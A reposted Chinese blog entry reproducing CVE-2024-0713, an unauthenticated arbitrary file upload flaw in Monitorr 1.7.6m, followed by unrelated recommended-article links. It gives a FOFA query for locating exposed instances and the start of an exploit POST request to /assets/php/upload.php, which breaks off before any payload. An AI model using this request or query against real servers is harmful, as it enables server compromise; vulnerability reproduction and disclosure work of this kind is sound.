博客
关于我
Monitorr 任意文件上传漏洞复现(CVE-2024-0713)
阅读量:795 次
发布时间:2023-02-09

本文共 547 字,大约阅读时间需要 1 分钟。

0x01 产品简介

Monitorr是一个实时显示任何网络应用程序或服务状态的网络前端。

0x02 漏洞概述

Monitorr 1.7.6m 版本中发现漏洞。它已被宣布为关键。受此漏洞影响的是组件服务配置的文件 /assets/php/upload.php 的未知功能。对参数 fileToUpload 的操作会导致不受限制的上传,未经身份验证的攻击者可远程上传恶意文件导致服务器失陷。

0x03 复现环境

FOFA:body="assets/php/timestamp.php"

0x04 漏洞复现

Exp

POST /assets/php/upload.php HTTP/1.1Host: your-ipUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_4)Accept-Encoding: gzip, deflateAccept: */*Connection: keep-aliveContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryMmx988TUuintqO4Q------WebKitFormBoundaryMmx988TUuintqO4QCo

转载地址:http://bpffk.baihongyu.com/

你可能感兴趣的文章
Multimodal Unsupervised Image-to-Image Translation多通道无监督图像翻译
查看>>
MySQL Cluster与MGR集群实战
查看>>
multipart/form-data与application/octet-stream的区别、application/x-www-form-urlencoded
查看>>
mysql cmake 报错,MySQL云服务器应用及cmake报错解决办法
查看>>
Multiple websites on single instance of IIS
查看>>
mysql CONCAT()函数拼接有NULL
查看>>
multiprocessing.Manager 嵌套共享对象不适用于队列
查看>>
multiprocessing.pool.map 和带有两个参数的函数
查看>>
MYSQL CONCAT函数
查看>>
multiprocessing.Pool:map_async 和 imap 有什么区别?
查看>>
MySQL Connector/Net 句柄泄露
查看>>
multiprocessor(中)
查看>>
mysql CPU使用率过高的一次处理经历
查看>>
Multisim中555定时器使用技巧
查看>>
MySQL CRUD 数据表基础操作实战
查看>>
multisim变压器反馈式_穿过隔离栅供电:认识隔离式直流/ 直流偏置电源
查看>>
mysql csv import meets charset
查看>>
multivariate_normal TypeError: ufunc ‘add‘ output (typecode ‘O‘) could not be coerced to provided……
查看>>
MySQL DBA 数据库优化策略
查看>>
multi_index_container
查看>>